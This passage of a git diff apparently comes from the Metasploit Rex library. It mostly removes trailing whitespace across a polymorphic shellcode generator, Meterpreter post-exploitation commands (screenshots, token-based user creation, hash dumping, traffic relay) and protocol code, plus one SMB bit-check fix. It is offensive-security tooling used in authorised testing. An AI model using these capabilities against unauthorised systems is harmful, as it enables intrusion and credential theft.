::Hash.new @solution = Solution.new - + _create_primitives - + @blocks['begin'] = Block.new( 'begin' ) @blocks['begin'] << SymbolicPermutation.new( 'begin', self ) - + _create_variable( 'temp' ) end - + # # Overloaded by a subclass to return the maximum native general register size supported. # def native_size nil end - + # # Use METASM to assemble a line of asm using this machines current cpu. # def assemble( asm ) return Metasm::Shellcode.assemble( @cpu, asm ).encode_string end - + # # Check if a data blob is valid against the badchar list (or perform any other validation here) # @@ -390,7 +390,7 @@ module Rex end return Rex::Text.badchar_index( data, @badchars ).nil? end - + # # Generate a 64 bit number whoes bytes are valid in this machine. # @@ -418,7 +418,7 @@ module Rex def make_safe_byte( number=nil ) return _make_safe_number( BYTE, number ) & 0xFF end - + # # Create a variable by name which will be assigned a register during generation. We can # optionally assign a static register value to a variable if needed. @@ -430,7 +430,7 @@ module Rex end return _create_variable( name, reg ) end - + # # If the temp variable was assigned we release it. # @@ -448,7 +448,7 @@ module Rex end return false end - + # # Resolve a variable name into its currently assigned register value. # @@ -472,14 +472,14 @@ module Rex # resolve the register number int a string representation (e.g. 0 in x86 is EAX if size is 32) return _register_value( regnum, size ) end - + # # Check this solution is still currently valid (as offsets change it may not be). # def solution_is_valid? return self.is_valid?( @solution.buffer ) end - + # # As the solution advances we save state for each permutation step in the solution. This lets # use rewind at a later stage if the solving algorithm wishes to perform some backtracking. @@ -487,7 +487,7 @@ module Rex def solution_push( permutation ) @solution.push( permutation, @reg_available, @reg_consumed, @variables ) end - + # # Backtrack one step in the solution and restore the register/variable state. # @@ -496,7 +496,7 @@ module Rex @reg_available.push( @reg_available.shift ) end - + # # Create a block by name and add in its list of permutations. # @@ -531,7 +531,7 @@ module Rex end return _create_block_primitive( block_name, primitive_name, *args ) end - + # # Get the offset for a blocks active permutation. This is easy for backward references as # they will already have been rendered and their sizes known. For forward references we @@ -558,16 +558,16 @@ module Rex def block_exist?( name ) return @blocks.include?( name ) end - + # # Does a given block exist? # def variable_exist?( name ) return @variables.include?( name ) end - + # XXX: ambiguity between variable names and block name may introduce confusion!!! make them be unique. - + # # Resolve a given value into either a number literal, a block offset or # a variables assigned register. @@ -580,7 +580,7 @@ module Rex end return value.to_i end - + # # Get the block previous to the target block. # @@ -606,7 +606,7 @@ module Rex end return nil end - + # # Try to generate a solution. # @@ -615,7 +615,7 @@ module Rex if( @blocks.has_key?( 'end' ) ) @blocks.delete( 'end' ) end - + @blocks['end'] = Block.new( 'end' ) @blocks['end'] << SymbolicPermutation.new( 'end', self, 1 ) @@ -635,31 +635,31 @@ module Rex end previous = current end - + # Shuffle the order of the available registers @reg_available = @reg_available.shuffle - - # We must try every permutation of the register orders, so if we fail to - # generate a solution we rotate the available registers to try again with + + # We must try every permutation of the register orders, so if we fail to + # generate a solution we rotate the available registers to try again with # a different order. This ensures we perform and exhaustive search. 0.upto( @reg_available.length - 1 ) do @solution.reset - # Start from the root node in the solution space and generate a + # Start from the root node in the solution space and generate a # solution by traversing the solution space's tree structure. if( @blocks['begin'].solve ) # Return the solutions buffer (perform a last pass to fixup all offsets)... return @solution.buffer end - + @reg_available.push( @reg_available.shift ) end - + # :( nil end - + # # An UndefinedPermutation exception is raised when a permutation can't render yet # as the conditions required are not yet satisfied. @@ -669,7 +669,7 @@ module Rex super end end - + # # An UnallowedPermutation exception is raised when a permutation can't ever render # as the conditions supplied are impossible to satisfy. @@ -679,7 +679,7 @@ module Rex super end end - + # # An InvalidPermutation exception is raised when a permutation receives a invalid # argument and cannot continue to render. This is a fatal exception. @@ -689,19 +689,19 @@ module Rex super end end - + protected - + # # Overloaded by a subclass to resolve a register number into a suitable register # name for the target architecture. E.g on x64 the register number 0 with size 64 - # would resolve to RCX. Size is nil by default to indicate we want the default + # would resolve to RCX. Size is nil by default to indicate we want the default # machine size, e.g. 32bit DWORD on x86 or 64bit QWORD on x64. # def _register_value( regnum, size=nil ) nil end - + # # Perform the actual variable creation. # @@ -735,7 +735,7 @@ module Rex @variables[name] = regnum return name end - + # # Create a block which is based on a primitive defined by this machine. # @@ -750,14 +750,14 @@ module Rex end return block_name end - + # # Overloaded by a subclass to create any primitives available in this machine. # def _create_primitives nil end - + # # Rex::Poly::Machine::Primitive # @@ -771,9 +771,9 @@ module Rex @primitives[name] << Primitive.new( permutation ) end end - + # - # Helper function to generate a number whoes byte representation is valid in this + # Helper function to generate a number whoes byte representation is valid in this # machine (does not contain any badchars for example). Optionally we can supply a # number and the resulting addition/subtraction of this number against the newly # generated value is also tested for validity. This helps in the assembly primitives @@ -792,38 +792,38 @@ module Rex else raise RuntimeError, "Invalid size '#{bytes}' used in _make_safe_number." end - + goodchars = (0..255).to_a - + @badchars.unpack( 'C*' ).each do | b | goodchars.delete( b.chr ) end while( true ) do value = 0 - + 0.upto( bytes-1 ) do | i | value |= ( (goodchars[ rand(goodchars.length) ] << i*8) & (0xFF << i*8) ) end - + if( not is_valid?( [ value ].pack(format) ) or not is_valid?( [ ~value ].pack(format) ) ) redo end - + if( not number.nil? ) if( not is_valid?( [ value + number ].pack(format) ) or not is_valid?( [ value - number ].pack(format) ) ) redo end end - + break end - + return value end - + end - + end - + end diff --git a/lib/rex/poly/machine/x86.rb b/lib/rex/poly/machine/x86.rb index e72d7aa2d7..05ecb82c0a 100644 --- a/lib/rex/poly/machine/x86.rb +++ b/lib/rex/poly/machine/x86.rb @@ -2,7 +2,7 @@ module Rex module Poly - + # # A subclass to represent a Rex poly machine on the x86 architecture. # @@ -19,25 +19,25 @@ module Rex @reg_available << Rex::Arch::X86::EDI @reg_available << Rex::Arch::X86::EBP @reg_available << Rex::Arch::X86::ESP - - # By default we consume the EBP register if badchars contains \x00. This helps speed - # things up greatly as many instructions opperating on EBP introduce a NULL byte. For - # example, a MOV instruction with EAX as the source operand is as follows: + + # By default we consume the EBP register if badchars contains \x00. This helps speed + # things up greatly as many instructions opperating on EBP introduce a NULL byte. For + # example, a MOV instruction with EAX as the source operand is as follows: # 8B08 mov ecx, [eax] - # but the same instruction with EBP as the source operand is as follows: + # but the same instruction with EBP as the source operand is as follows: # 8B4D00 mov ecx, [ebp] ; This is assembled as 'mov ecx, [ebp+0]' # we can see that EBP is encoded differently with an offset included. We can still - # try to generate a solution with EBP included and \x00 in the badchars list but + # try to generate a solution with EBP included and \x00 in the badchars list but # it can take considerably longer. if( ( consume_base_pointer.nil? and not Rex::Text.badchar_index( "\x00", @badchars ).nil? ) or consume_base_pointer == true ) create_variable( 'base_pointer', 'ebp' ) end - + # By default we consume the ESP register to avoid munging the stack. if( consume_stack_pointer ) create_variable( 'stack_pointer', 'esp' ) end - + # discover all the safe FPU instruction we can use. @safe_fpu_instructions = ::Array.new Rex::Arch::X86.fpu_instructions.each do | fpu | @@ -46,17 +46,17 @@ module Rex end end end - + # # The general purpose registers are 32bit # def native_size Rex::Poly::Machine::DWORD end - + # # Overload this method to intercept the 'set' primitive with the 'location' keyword - # and create the block with the '_set_variable_location'. We do this to keep a + # and create the block with the '_set_variable_location'. We do this to keep a # consistent style. # def create_block_primitive( block_name, primitive_name, *args ) @@ -66,10 +66,10 @@ module Rex super end end - + # - # XXX: If we have a loop primitive, it is a decent speed bump to force the associated variable - # of the first loop primitive to be assigned as ECX (for the x86 LOOP instruction), this is not + # XXX: If we have a loop primitive, it is a decent speed bump to force the associated variable + # of the first loop primitive to be assigned as ECX (for the x86 LOOP instruction), this is not # neccasary but can speed generation up significantly. # #def generate @@ -83,7 +83,7 @@ module Rex # # ...go go go # super #end - + protected # @@ -95,7 +95,7 @@ module Rex if( size.nil? ) size = native_size() end - + if( size == Rex::Poly::Machine::DWORD ) value = Rex::Arch::X86::REG_NAMES32[ regnum ] elsif( size == Rex::Poly::Machine::WORD ) @@ -108,7 +108,7 @@ module Rex end return value end - + # # Create the x86 primitives. # @@ -118,7 +118,7 @@ module Rex # Create the '_set_variable_location' primitive. The first param it the variable to place the current # blocks location value in. # - _create_primitive( '_set_variable_location', + _create_primitive( '_set_variable_location', ::Proc.new do | block, machine, variable | if( @safe_fpu_instructions.empty? ) raise UnallowedPermutation @@ -182,12 +182,12 @@ module Rex ] end ) - + # - # Create the 'loop' primitive. The first param it the counter variable which holds the number of + # Create the 'loop' primitive. The first param it the counter variable which holds the number of # times to perform the loop. The second param it the destination block to loop to. # - _create_primitive( 'loop', + _create_primitive( 'loop', ::Proc.new do | block, machine, counter, destination | if( machine.variable_value( counter ) != Rex::Arch::X86::REG_NAMES32[ Rex::Arch::X86::ECX ] ) # we raise and UndefinedPermutation exception to indicate that untill a valid register (ECX) is @@ -208,12 +208,12 @@ module Rex ] end ) - + # # Create the 'xor' primitive. The first param it the variable to xor with the second param value which # can be either a variable, literal or block offset. # - _create_primitive( 'xor', + _create_primitive( 'xor', ::Proc.new do | block, machine, variable, value | [ "xor #{machine.variable_value( variable )}, #{machine.resolve_value( value )}" @@ -230,11 +230,11 @@ module Rex ] end ) - + # # Create the 'goto' primitive. The first param is a destination block to jump to. # - _create_primitive( 'goto', + _create_primitive( 'goto', ::Proc.new do | block, machine, destination | offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) ) if( ( offset > 0 and offset > 127 ) or ( offset < 0 and offset < -127 ) ) @@ -253,13 +253,13 @@ module Rex ] end ) - + # # Create the 'add' primitive. The first param it the variable which will be added to the second - # param, which may either be a literal number value, a variables assigned register or a block + # param, which may either be a literal number value, a variables assigned register or a block # name, in which case the block offset will be used. # - _create_primitive( 'add', + _create_primitive( 'add', ::Proc.new do | block, machine, variable, value | if( machine.variable_exist?( value ) ) raise UnallowedPermutation @@ -276,7 +276,7 @@ module Rex ] end, ::Proc.new do | block, machine, variable, value | - [ + [ "add #{machine.variable_value( variable )}, #{machine.resolve_value( value )}" ] end, @@ -284,7 +284,7 @@ module Rex if( machine.variable_exist?( value ) ) raise UnallowedPermutation end - [ + [ "sub #{machine.variable_value( variable )}, #{ "0x%08X" % [ ~(machine.resolve_value( value ) - 1) & 0xFFFFFFFF ] }" ] end @@ -311,12 +311,12 @@ module Rex # ] # end, ) - + # # Create the 'set' primitive. The first param it the variable which will be set. the second # param is the value to set the variable to (a variable, block or literal). # - _create_primitive( 'set', + _create_primitive( 'set', ::Proc.new do | block, machine, variable, value | if( machine.variable_exist?( value ) ) raise UnallowedPermutation @@ -385,13 +385,13 @@ module Rex ] end ) - + # # Create the 'load' primitive. The first param it the variable which will be set. The second # param is the value (either a variable or literal) to load from. the third param is the size # of the load operation, either DWORD, WORD or BYTE. # - _create_primitive( 'load', + _create_primitive( 'load', ::Proc.new do | block, machine, variable, value, size | result = nil if( size == Rex::Poly::Machine::DWORD ) @@ -460,7 +460,7 @@ module Rex # # Create the 'store' primitive. # - _create_primitive( 'store', + _create_primitive( 'store', ::Proc.new do | block, machine, variable, value, size | result = nil if( size == Rex::Poly::Machine::DWORD ) @@ -483,12 +483,12 @@ module Rex ::Proc.new do | block, machine, variable, value, size | result = nil if( size == Rex::Poly::Machine::DWORD ) - result = [ + result = [ "push #{machine.resolve_value( value )}", "pop [#{machine.variable_value( variable )}]" ] elsif( size == Rex::Poly::Machine::WORD ) - result = [ + result = [ "push #{machine.resolve_value( value, WORD )}", "pop word [#{machine.variable_value( variable )}]" ] @@ -500,9 +500,9 @@ module Rex end ) end - + end - + end - -end \ No newline at end of file + +end diff --git a/lib/rex/post/dir.rb b/lib/rex/post/dir.rb index 8c73148e6b..0e5cdaa2db 100644 --- a/lib/rex/post/dir.rb +++ b/lib/rex/post/dir.rb @@ -19,31 +19,31 @@ class Dir def Dir.foreach(name, &block) entries(name).each(&block) end - + def Dir.chdir(path) raise NotImplementedError end - + def Dir.mkdir(path) raise NotImplementedError end - + def Dir.pwd raise NotImplementedError end - + def Dir.getwd raise NotImplementedError end - + def Dir.delete(path) raise NotImplementedError end - + def Dir.rmdir(path) raise NotImplementedError end - + def Dir.unlink(path) raise NotImplementedError end diff --git a/lib/rex/post/file_stat.rb b/lib/rex/post/file_stat.rb index c5ecee2b8a..992621f293 100644 --- a/lib/rex/post/file_stat.rb +++ b/lib/rex/post/file_stat.rb @@ -32,7 +32,7 @@ class FileStat self.stathash = {} update(buf) if (buf and not buf.empty?) end - + def dev self.stathash['st_dev'] end @@ -77,7 +77,7 @@ class FileStat # XXX: This needs to understand more than just 'stat' structures # Windows can also return _stat32, _stat32i64, _stat64i32, and _stat64 structures - + skeys = %W{st_dev st_ino st_mode st_wtf st_nlink st_uid st_gid st_rdev st_size st_ctime st_atime st_mtime} svals = buf.unpack("VvvvvvvVVVVV") skeys.each_index do |i| diff --git a/lib/rex/post/io.rb b/lib/rex/post/io.rb index 17e71d1d76..6583de81fa 100644 --- a/lib/rex/post/io.rb +++ b/lib/rex/post/io.rb @@ -133,7 +133,7 @@ class IO def readline(sep = $/) raise NotImplementedError end - + def readlines(sep = $/) raise NotImplementedError end @@ -141,7 +141,7 @@ class IO def rewind raise NotImplementedError end - + def seek(offset, whence = SEEK_SET) raise NotImplementedError end @@ -165,12 +165,12 @@ class IO def syswrite(buf) raise NotImplementedError end - + def tell return pos end - def ungetc(val) + def ungetc(val) raise NotImplementedError end diff --git a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb index 2712727e97..54e5941ab8 100644 --- a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb @@ -6,7 +6,7 @@ module Extensions module NetworkPug TLV_TYPE_EXTENSION_NETWORKPUG = 0 -TLV_TYPE_NETWORKPUG_INTERFACE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 1) +TLV_TYPE_NETWORKPUG_INTERFACE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 1) TLV_TYPE_NETWORKPUG_FILTER = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 2) end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb index 4e35ba8ff2..e18cb20074 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb @@ -39,10 +39,10 @@ class Arp mac_addr.each_byte { |o| macocts << o } macocts += [0] * (6 - macocts.size) if macocts.size < 6 return sprintf("%02x:%02x:%02x:%02x:%02x:%02x", - macocts[0], macocts[1], macocts[2], + macocts[0], macocts[1], macocts[2], macocts[3], macocts[4], macocts[5]) end - + # # The ip address corresponding to the arp address. # diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb index cbfbe884ed..bc17fb9b55 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb @@ -118,7 +118,7 @@ class Config netstat = [] response = client.send_request(request) - + # Build out the array of netstat response.each(TLV_TYPE_NETSTAT_ENTRY) { |connection| netstat << Netstat.new( diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb index 9df87fbd5e..b947ea692e 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb @@ -38,7 +38,7 @@ class Netstat self.uid = opts[:uid] || 0 self.inode = opts[:inode] || 0 self.pid_name = opts[:pid_name] - + self.local_addr_str = sprintf("%s:%d",self.local_addr, self.local_port) if self.remote_port == 0 port = "*" @@ -48,7 +48,7 @@ class Netstat self.remote_addr_str = sprintf("%s:%s",self.remote_addr, port) end - + # # The local address of the connection # diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb index 06b42e9a78..c8dd03de88 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb @@ -74,14 +74,14 @@ class WinConstManager # # Returns an array of constant names that have a value matching "winconst" # and (optionally) a name that matches "filter_regex" - # + # def select_const_names(winconst, filter_regex=nil) matches = [] consts.each_pair do |name, value| matches << name if value == winconst end - + # Filter matches by name if a filter has been provided unless filter_regex.nil? matches.reject! do |name| diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb index cd4a981d0c..50eb6406fe 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb @@ -73,14 +73,14 @@ class Console::CommandDispatcher::Espia print_line("Grab a screenshot of the current interactive desktop.\n") return true end - + show = true show = false if (args[1] and args[1] =~ /^(f|n|0)/i) - + path = args[0] || Rex::Text.rand_text_alpha(8) + ".jpeg" - + data = client.espia.espia_image_get_dev_screen - + if( data ) ::File.open( path, 'wb' ) do |fd| fd.write( data ) @@ -89,7 +89,7 @@ class Console::CommandDispatcher::Espia print_line( "Screenshot saved to: #{path}" ) Rex::Compat.open_file( path ) if show end - + return true end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb index d6e2827f13..4040324737 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb @@ -124,7 +124,7 @@ class Console::CommandDispatcher::Incognito host = val end } - + if (args.length < 2) print_line("Usage: add_user [options]\n") print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted") @@ -154,7 +154,7 @@ class Console::CommandDispatcher::Incognito host = val end } - + if (args.length < 2) print_line("Usage: add_localgroup_user [options]\n") print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted") @@ -184,7 +184,7 @@ class Console::CommandDispatcher::Incognito host = val end } - + if (args.length < 2) print_line("Usage: add_group_user [options]\n") print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted") @@ -216,7 +216,7 @@ class Console::CommandDispatcher::Incognito print_line("[*] Snarfing token hashes...") client.incognito.incognito_snarf_hashes(args[0]) print_line("[*] Done. Check sniffer logs") - + return true end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb index 8acec7a477..c10e76bd5c 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb @@ -58,7 +58,7 @@ class Console::CommandDispatcher::NetworkPug rescue Errno::EBUSY next end - + ifreq = [ name ].pack("a32") tapdev.ioctl(0x8927, ifreq) @@ -69,7 +69,7 @@ class Console::CommandDispatcher::NetworkPug return tapdev, name, mac } - + tapdev.close() return nil, nil, nil end @@ -86,7 +86,7 @@ class Console::CommandDispatcher::NetworkPug len = len.unpack('n')[0] #print_line("Got #{len} bytes from remote host's network") - + if(len > 1514 or len == 0) @tapdev.close() print_line("length is invalid .. #{len} ?, de-synchronized ? ") @@ -187,13 +187,13 @@ class Console::CommandDispatcher::NetworkPug return true end - + def cmd_networkpug_stop(*args) interface = args[0] if (interface == nil) print_error("Usage: networkpug_stop [interface]") return - end + end client.networkpug.networkpug_stop(interface) @@ -208,7 +208,7 @@ class Console::CommandDispatcher::NetworkPug # meterpreter dies if i try to join.. not sure why. @thread_stuff = nil - + #print_line("closing tapdev") @tapdev.close @@ -219,7 +219,7 @@ class Console::CommandDispatcher::NetworkPug print_status("Packet slinging stopped on #{interface}") return true end - + def name "NetworkPug" end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb index b8b7290a65..c5a019c6db 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb @@ -40,7 +40,7 @@ class Console::CommandDispatcher::Priv::Passwd client.priv.sam_hashes.each { |user| print_line("#{user}") } - + return true end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb index 52be25d704..96bf3913b3 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb @@ -267,7 +267,7 @@ class Console::CommandDispatcher::Stdapi::Net print_error "Invalid Subnet mask" return false end - + print_line("Creating route #{args[0]}/#{args[1]} -> #{args[2]}") client.net.config.add_route(*args) @@ -282,7 +282,7 @@ class Console::CommandDispatcher::Stdapi::Net print_error "Invalid Subnet mask" return false end - + print_line("Deleting route #{args[0]}/#{args[1]} -> #{args[2]}") client.net.config.remove_route(*args) @@ -397,7 +397,7 @@ class Console::CommandDispatcher::Stdapi::Net else print_error("Failed to stop TCP relay on #{lhost || '0.0.0.0'}:#{lport}") next - end + end counter += 1 end diff --git a/lib/rex/proto/addp.rb b/lib/rex/proto/addp.rb index c1373b9a8a..e5116c6b6d 100644 --- a/lib/rex/proto/addp.rb +++ b/lib/rex/proto/addp.rb @@ -20,10 +20,10 @@ module Proto ERRORS = %W{ no_response unknown success authenticaton_failed unit_has_address invalid_value invalid_data unsupported_command } WLAN_ENC_MODES = %W{ unknown none wep40 wep128 } WLAN_AUTH_MODES = %W{ unknown open shared_key open_shared_key } - HWTYPES = %W{ - unknown ps3_desk8 ps3_desk16 ps3_desk32 ps3_rack16 ps2_desk16 ps2_rack16 + HWTYPES = %W{ + unknown ps3_desk8 ps3_desk16 ps3_desk32 ps3_rack16 ps2_desk16 ps2_rack16 lets_desk1 lets_desk2 lets_desk4 dorpia_dinrail1 nubox01 nubox02 nubox04 - digione_sp digione_ia digione_em + digione_sp digione_ia digione_em } CMD_CONF_REQ = 1 @@ -35,7 +35,7 @@ module Proto CMD_SET_DHCP_REQ = 7 CMD_SET_DHCP_REP = 8 CMD_SET_WL_REQ = 9 - CMD_SET_WL_REP = 10 + CMD_SET_WL_REP = 10 CMD_SET_WL_COUNTRIES_REQ = 11 CMD_SET_WL_COUNTRIES_REP = 12 CMD_EDP = 13 @@ -61,11 +61,11 @@ module Proto def self.request_static_ip(magic, dmac, ip, mask, gw, pwd="dbps") mac = (dmac.length == 6) ? dmac : Rex::Socket.eth_aton(dmac) - buf = + buf = Rex::Socket.addr_aton(ip) + Rex::Socket.addr_aton(mask) + Rex::Socket.addr_aton(gw) + - mac + + mac + self.encode_password(pwd) req = magic + [CMD_SET_ADDR_REQ, buf.length].pack("nn") + buf @@ -74,9 +74,9 @@ module Proto def self.request_dhcp(magic, dmac, enabled, pwd="dbps") mac = (dmac.length == 6) ? dmac : Rex::Socket.eth_aton(dmac) - buf = + buf = [ enabled ? 1 : 0 ].pack("C") + - mac + + mac + self.encode_password(pwd) req = magic + [CMD_SET_DHCP_REQ, buf.length].pack("nn") + buf @@ -86,11 +86,11 @@ module Proto def self.request_reboot(magic, dmac, pwd="dbps") mac = (dmac.length == 6) ? dmac : Rex::Socket.eth_aton(dmac) buf = - mac + + mac + self.encode_password(pwd) req = magic + [CMD_REBOOT_REQ, buf.length].pack("nn") + buf - return req + return req end def self.decode_reply(data) @@ -185,7 +185,7 @@ module Proto # Store unknown responses res["unknown_0x#{"%.2x" % i_type}".to_sym] = i_data end - + bidx = bidx + 2 + i_len end return res @@ -194,8 +194,8 @@ module Proto def self.reply_to_string(res) str = "" - fields = [ - :hwname, :hwtype, :hwrev, :fwrev, + fields = [ + :hwname, :hwtype, :hwrev, :fwrev, :mac, :ip, :mask, :gw, :hostname, :domain, :dns, :dhcp, :msg, :result, :error, :advisory, :ports, :realport, :realport_enc, diff --git a/lib/rex/proto/dcerpc/exceptions.rb b/lib/rex/proto/dcerpc/exceptions.rb index f9b204edd3..80e7ccd5d2 100644 --- a/lib/rex/proto/dcerpc/exceptions.rb +++ b/lib/rex/proto/dcerpc/exceptions.rb @@ -5,7 +5,7 @@ module DCERPC module Exceptions class Error < ::RuntimeError - + @@errors = { 0x00000000 => "stub-defined", 0x00000001 => "nca_s_fault_other", @@ -103,7 +103,7 @@ class Error < ::RuntimeError 0x1c010014 => "nca_server_too_busy", 0x1c010017 => "nca_unsupported_type" } - + def initialize(*args) super(*args) end @@ -136,7 +136,7 @@ class InvalidPacket < Error def initialize(message = nil) @message = message end - + def to_s str = 'Invalid packet.' if (@message) diff --git a/lib/rex/proto/dcerpc/ndr.rb b/lib/rex/proto/dcerpc/ndr.rb index d07bd0e0f5..a4ef79b507 100644 --- a/lib/rex/proto/dcerpc/ndr.rb +++ b/lib/rex/proto/dcerpc/ndr.rb @@ -20,7 +20,7 @@ class NDR warn 'should be using Rex::Encoder::NDR' return [string].pack('V') end - + # Encode a 2 byte short # use to encode: # short element_1; @@ -28,7 +28,7 @@ class NDR warn 'should be using Rex::Encoder::NDR' return [string].pack('v') end - + # Encode a single byte # use to encode: # byte element_1; @@ -53,7 +53,7 @@ class NDR string += "\x00" # null pad return long(string.length) + long(0) + long(string.length) + Rex::Text.to_unicode(string) + align(Rex::Text.to_unicode(string)) end - + # Encode a string that is already unicode encoded # use to encode: # w_char *element_1; diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index f360701556..495a3564d6 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -129,11 +129,11 @@ class Client # @return [ClientRequest] def request_raw(opts={}) opts = self.config.merge(opts) - + opts['ssl'] = self.ssl opts['cgi'] = false opts['port'] = self.port - + req = ClientRequest.new(opts) end @@ -151,7 +151,7 @@ class Client # @return [ClientRequest] def request_cgi(opts={}) opts = self.config.merge(opts) - + opts['ctype'] ||= 'application/x-www-form-urlencoded' opts['ssl'] = self.ssl opts['cgi'] = true diff --git a/lib/rex/proto/http/handler/proc.rb b/lib/rex/proto/http/handler/proc.rb index 03e66a26c2..c5422fb375 100644 --- a/lib/rex/proto/http/handler/proc.rb +++ b/lib/rex/proto/http/handler/proc.rb @@ -27,7 +27,7 @@ class Handler::Proc < Handler # Returns true if the procedure is representing a virtual directory. # def relative_resource_required? - virt_dir + virt_dir end # diff --git a/lib/rex/proto/http/server.rb b/lib/rex/proto/http/server.rb index b10dc1e8a5..8d16732c1e 100644 --- a/lib/rex/proto/http/server.rb +++ b/lib/rex/proto/http/server.rb @@ -288,7 +288,7 @@ protected when Packet::ParseCode::Completed dispatch_request(cli, cli.request) cli.reset_cli - + when Packet::ParseCode::Partial # Return and wait for the on_client_data handler to be called again # The Request object tracks the state of the request for us diff --git a/lib/rex/proto/iax2/codecs/alaw.rb b/lib/rex/proto/iax2/codecs/alaw.rb index f011356719..c980446912 100644 --- a/lib/rex/proto/iax2/codecs/alaw.rb +++ b/lib/rex/proto/iax2/codecs/alaw.rb @@ -8,7 +8,7 @@ class ALaw < G711 def self.decode(buff) buff.unpack("C*").map{ |x| LOOKUP_ALAW2LIN16[x] }.pack('v*') end - + end end end diff --git a/lib/rex/proto/iax2/codecs/mulaw.rb b/lib/rex/proto/iax2/codecs/mulaw.rb index 25131c7149..d4203568a1 100644 --- a/lib/rex/proto/iax2/codecs/mulaw.rb +++ b/lib/rex/proto/iax2/codecs/mulaw.rb @@ -9,7 +9,7 @@ class MuLaw < G711 def self.decode(buff) buff.unpack("C*").map{ |x| LOOKUP_ULAW2LIN16[x] }.pack('v*') end - + end end end diff --git a/lib/rex/proto/ntlm/constants.rb b/lib/rex/proto/ntlm/constants.rb index 8a78ddae8a..db10360ab7 100644 --- a/lib/rex/proto/ntlm/constants.rb +++ b/lib/rex/proto/ntlm/constants.rb @@ -9,7 +9,7 @@ class Constants LM_MAGIC = "KGS!@\#$%" TIME_OFFSET = 11644473600 MAX64 = 0xffffffffffffffff - + FLAGS = { :UNICODE => 0x00000001, :OEM => 0x00000002, @@ -32,7 +32,7 @@ class Constants :KEY128 => 0x20000000, :KEY56 => 0x80000000 } - + FLAG_KEYS = FLAGS.keys.sort{|a, b| FLAGS[a] <=> FLAGS[b] } DEFAULT_FLAGS = { diff --git a/lib/rex/proto/rfb/cipher.rb b/lib/rex/proto/rfb/cipher.rb index 216e953945..7a0c37dbdb 100644 --- a/lib/rex/proto/rfb/cipher.rb +++ b/lib/rex/proto/rfb/cipher.rb @@ -31,7 +31,7 @@ module RFB ## class Cipher - + def self.mangle_password(password) key = '' key = password.dup if password diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index 72c35379fb..807713956e 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb @@ -1884,7 +1884,7 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils name = resp_data[didx + 70 + 24, info[15]].sub!(/\x00+$/, '') files[name] = { - 'type' => (info[14] & 0x10) ? 'D' : 'F', + 'type' => ((info[14] & 0x10)==0x10) ? 'D' : 'F', 'attr' => info[14], 'info' => info } diff --git a/lib/rex/proto/smb/constants.rb b/lib/rex/proto/smb/constants.rb index e03085830a..fb19e389cd 100644 --- a/lib/rex/proto/smb/constants.rb +++ b/lib/rex/proto/smb/constants.rb @@ 